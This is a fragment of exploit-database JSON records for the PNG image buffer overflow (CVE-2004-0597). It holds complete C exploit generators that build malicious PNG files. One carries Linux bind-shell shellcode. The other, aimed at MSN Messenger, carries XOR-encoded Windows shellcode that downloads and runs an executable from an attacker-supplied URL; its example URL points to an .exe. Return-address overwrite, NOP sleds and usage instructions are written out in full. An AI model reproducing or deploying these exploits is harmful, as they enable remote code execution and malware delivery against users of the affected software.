\"\\x10\\x56\\x50\\x89\\xe1\\xb0\\x66\\xb3\\x02\\xcd\\x80\\x6a\\x01\\x55\\x89\\xe1\\x31\" \r\n \"\\xc0\\x31\\xdb\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x50\\x50\\x55\\x89\\xe1\\xb0\" \r\n \"\\x66\\xb3\\x05\\xcd\\x80\\x89\\xc5\\x31\\xc0\\x89\\xeb\\x31\\xc9\\xb0\\x3f\\xcd\\x80\" \r\n \"\\x41\\x80\\xf9\\x03\\x7c\\xf6\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\" \r\n \"\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\"; \r\n \r\n\r\n \r\n\r\n \r\n\r\nint main(int argc, char **argv) \r\n{ 
\r\n int fd = 0, len = 0, x = 0, chunk_len = 0; \r\n char *filename = OUTFILE; \r\n u_char buf[BS]; \r\n u_long retaddr = 0; \r\n \r\n\r\n if(argc < 2){ \r\n fprintf(stderr, \"Usage: %s < retaddr > [ outfile ]\\n\", argv[0]); \r\n return EXIT_FAILURE; \r\n } \r\n if(argc > 2) \r\n filename = argv[2]; \r\n \r\n\r\n memset(buf, 0, BS); \r\n sscanf(argv[1], \"%lx\", &retaddr); \r\n \r\n\r\n /* create buffer: \r\n * png id - png ihdr - png trns - retaddr - NOPS - shell - crc(don't need) \r\n */ \r\n memcpy(buf, png_majic, MAJIC_LEN); \r\n len += MAJIC_LEN; \r\n memcpy(buf+len, png_ihdr, IHDR_LEN); \r\n len += IHDR_LEN; \r\n memcpy(buf+len, png_trns_len_id, TRNS_LEN); \r\n len += TRNS_LEN; \r\n \r\n\r\n for(x = 0; x < RETADDR_BYTES-3; x += 4) \r\n memcpy(buf+len+x+ALIGN, &retaddr, sizeof(retaddr)); \r\n x += ALIGN; \r\n len += x; \r\n memset(buf+len, NOP, NNOPS); \r\n len += NNOPS; \r\n memcpy(buf+len, sc, SHELL_LEN); \r\n len += SHELL_LEN; \r\n \r\n\r\n /* length of chunk data */ \r\n chunk_len = x + NNOPS + SHELL_LEN; \r\n *(u_long *)(buf+MAJIC_LEN+IHDR_LEN) = htonl(chunk_len); \r\n \r\n\r\n /* include the crc */ \r\n len += sizeof(u_long); \r\n \r\n\r\n /* create the file */ \r\n if( (fd = open(filename, O_WRONLY|O_CREAT|O_EXCL, 0666)) < 0) \r\n die(\"open\"); \r\n if(write(fd, buf, len) != len) \r\n die(\"write\"); \r\n close(fd); \r\n \r\n return 0; \r\n}\n\n// milw0rm.com [2004-08-11]\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/389/"}, {"lastseen": "2016-02-03T00:38:04", "description": "MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability. CVE-2004-0597. 
Remote exploit for windows platform", "published": "2005-02-08T00:00:00", "type": "exploitdb", "title": "MSN Messenger 6.2.0137 PNG Buffer Overflow Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2004-0597"], "modified": "2005-02-08T00:00:00", "id": "EDB-ID:25094", "href": "https://www.exploit-db.com/exploits/25094/", "sourceData": "source: http://www.securityfocus.com/bid/12506/info\r\n\r\nA remotely exploitable buffer overflow exists in MSN Messenger and Windows Messenger. This vulnerability is related to parsing of Portable Network Graphics (PNG) image header data. Successful exploitation will result in execution of arbitrary code in the context of the vulnerable client user.\r\n\r\nAttack vectors and mitigations may differ for MSN Messenger and Windows Messenger. For Windows Messenger, the attacker must spoof the .NET Messenger service and the client must be configured to receive .NET alerts.\r\n\r\nHowever, MSN Messenger may be exploited through various methods in a client-to-client attack. Possible attack vectors for this vulnerability in MSN Messenger include:\r\nUser display pictures\r\nCustom icons that are displayed inline in instant messages\r\nThumbnails of transferred images\r\nBackground images\r\n\r\nSince this issue may be exploited in a client-to-client attack for MSN Messenger, it is a likely candidate for development of a worm.\r\n\r\n/*\r\n*\r\n* MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\r\n* Bug discoveried by Core Security Technologies (www.coresecurity.com)\r\n* Exploit coded By ATmaCA\r\n* Copyright ?2002-2005 AtmacaSoft Inc. 
All Rights Reserved.\r\n* Web: http://www.atmacasoft.com\r\n* E-Mail: atmaca@icqmail.com\r\n* Credit to kozan and delikon\r\n* Usage:exploit <OutputPath> <Url>\r\n*\r\n*/\r\n\r\n/*\r\n*\r\n* Tested with MSN Messenger 6.2.0137\r\n* This vulnerability can be exploited on Windows 2000 (all service packs)\r\n* and Windows XP (all service packs) that run vulnerable\r\n* clients of MSN Messenger.\r\n*\r\n*/\r\n\r\n/*\r\n*\r\n* After creating vuln png image, open\r\n* MSN Messenger and select it as your display picture in\r\n* \"Tools->Change Display Picture\".\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <conio.h>\r\n#include <string.h>\r\n\r\n\r\n#ifdef __BORLANDC__\r\n #include <mem.h>\r\n#endif\r\n\r\n#define NOP 0x90\r\n\r\nchar png_header[] =\r\n\"\\x89\\x50\\x4E\\x47\\x0D\\x0A\\x1A\\x0A\\x00\\x00\\x00\\x0D\\x49\\x48\\x44\\x52\"\r\n\"\\x00\\x00\\x00\\x40\\x00\\x00\\x00\\x40\\x08\\x03\\x00\\x00\\x00\\x9D\\xB7\\x81\"\r\n\"\\xEC\\x00\\x00\\x01\\xB9\\x74\\x52\\x4E\\x53\";\r\n\r\nchar pngeof[] = \"\\x90\\x90\\x90\\x59\\xE8\\x47\\xFE\\xFF\\xFF\";\r\n\r\n/* Generic win32 http download shellcode\r\n xored with 0x1d by delikon (http://delikon.de/) */\r\nchar shellcode[] = 
\"\\xEB\"\r\n\"\\x10\\x58\\x31\\xC9\\x66\\x81\\xE9\\x22\\xFF\\x80\\x30\\x1D\\x40\\xE2\\xFA\\xEB\\x05\\xE8\\xEB\\xFF\"\r\n\"\\xFF\\xFF\\xF4\\xD1\\x1D\\x1D\\x1D\\x42\\xF5\\x4B\\x1D\\x1D\\x1D\\x94\\xDE\\x4D\\x75\\x93\\x53\\x13\"\r\n\"\\xF1\\xF5\\x7D\\x1D\\x1D\\x1D\\x2C\\xD4\\x7B\\xA4\\x72\\x73\\x4C\\x75\\x68\\x6F\\x71\\x70\\x49\\xE2\"\r\n\"\\xCD\\x4D\\x75\\x2B\\x07\\x32\\x6D\\xF5\\x5B\\x1D\\x1D\\x1D\\x2C\\xD4\\x4C\\x4C\\x90\\x2A\\x4B\\x90\"\r\n\"\\x6A\\x15\\x4B\\x4C\\xE2\\xCD\\x4E\\x75\\x85\\xE3\\x97\\x13\\xF5\\x30\\x1D\\x1D\\x1D\\x4C\\x4A\\xE2\"\r\n\"\\xCD\\x2C\\xD4\\x54\\xFF\\xE3\\x4E\\x75\\x63\\xC5\\xFF\\x6E\\xF5\\x04\\x1D\\x1D\\x1D\\xE2\\xCD\\x48\"\r\n\"\\x4B\\x79\\xBC\\x2D\\x1D\\x1D\\x1D\\x96\\x5D\\x11\\x96\\x6D\\x01\\xB0\\x96\\x75\\x15\\x94\\xF5\\x43\"\r\n\"\\x40\\xDE\\x4E\\x48\\x4B\\x4A\\x96\\x71\\x39\\x05\\x96\\x58\\x21\\x96\\x49\\x18\\x65\\x1C\\xF7\\x96\"\r\n\"\\x57\\x05\\x96\\x47\\x3D\\x1C\\xF6\\xFE\\x28\\x54\\x96\\x29\\x96\\x1C\\xF3\\x2C\\xE2\\xE1\\x2C\\xDD\"\r\n\"\\xB1\\x25\\xFD\\x69\\x1A\\xDC\\xD2\\x10\\x1C\\xDA\\xF6\\xEF\\x26\\x61\\x39\\x09\\x68\\xFC\\x96\\x47\"\r\n\"\\x39\\x1C\\xF6\\x7B\\x96\\x11\\x56\\x96\\x47\\x01\\x1C\\xF6\\x96\\x19\\x96\\x1C\\xF5\\xF4\\x1F\\x1D\"\r\n\"\\x1D\\x1D\\x2C\\xDD\\x94\\xF7\\x42\\x43\\x40\\x46\\xDE\\xF5\\x32\\xE2\\xE2\\xE2\\x70\\x75\\x75\\x33\"\r\n\"\\x78\\x65\\x78\\x1D\";\r\n\r\nFILE *di;\r\nint i = 0;\r\nshort int weblength;\r\nchar *web;\r\nchar *pointer = NULL;\r\nchar *newshellcode;\r\n\r\n/*xor cryptor*/\r\nchar *Sifrele(char *Name1)\r\n{\r\n char *Name=Name1;\r\n char xor=0x1d;\r\n int Size=strlen(Name);\r\n for(i=0;i<Size;i++)\r\n Name[i]=Name[i]^xor;\r\n return Name;\r\n}\r\n\r\n\r\nvoid main(int argc, char *argv[])\r\n{\r\n\r\n if (argc < 3)\r\n {\r\n printf(\"MSN Messenger PNG Image Buffer Overflow Download Shellcoded Exploit\\n\");\r\n printf(\"Bug discoveried by Core Security Technologies (www.coresecurity.com)\\n\");\r\n printf(\"Exploit coded By ATmaCA\\n\");\r\n printf(\"Copyright ?2002-2005 AtmacaSoft Inc. 
All Rights Reserved.\\n\");\r\n printf(\"Web: http://www.atmacasoft.com\\n\");\r\n printf(\"E-Mail: atmaca@icqmail.com\\n\");\r\n printf(\"Credit to kozan and delikon\\n\\n\");\r\n printf(\"\\tUsage:exploit <OutputPath> <Url>\\n\");\r\n printf(\"\\tExample:exploit vuln.png http://www.atmacasoft.com/exp/msg.exe\\n\");\r\n\r\n return;\r\n }\r\n\r\n\r\n web = argv[2];\r\n\r\n\r\n if( (di=fopen(argv[1],\"wb\")) == NULL )\r\n {\r\n printf(\"Error opening file!\\n\");\r\n return;\r\n }\r\n for(i=0;i<sizeof(png_header)-1;i++)\r\n fputc(png_header[i],di);\r\n\r\n /*stuff in a couple of NOPs*/\r\n for(i=0;i<99;i++)\r\n fputc(NOP,di);\r\n\r\n weblength=(short int)0xff22;\r\n pointer=strstr(shellcode,\"\\x22\\xff\");\r\n weblength-=strlen(web)+1;\r\n memcpy(pointer,&weblength,2);\r\n newshellcode = new char[sizeof(shellcode)+strlen(web)+1];\r\n strcpy(newshellcode,shellcode);\r\n strcat(newshellcode,Sifrele(web));\r\n strcat(newshellcode,\"\\x1d\");\r\n\r\n //shell code\r\n for(i=0;i<strlen(newshellcode);i++)\r\n fputc(newshellcode[i],di);\r\n\r\n\r\n for(i=0;i<(83-strlen(web));i++) //NOPs\r\n fputc(NOP,di);\r\n\r\n /*Overwriting the return address (EIP)*/\r\n /*0x005E0547 - ret */\r\n fputc(0x47,di);\r\n fputc(0x05,di);\r\n fputc(0x5e,di);\r\n fputc(0x00,di);\r\n\r\n for(i=0;i<sizeof(pngeof)-1;i++)\r\n fputc(pngeof[i],di);\r\n\r\n printf(\"Vulnarable png file %s has been generated!\\n\",argv[1]);\r\n\r\n fclose(di);\r\n}\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/25094/"}]}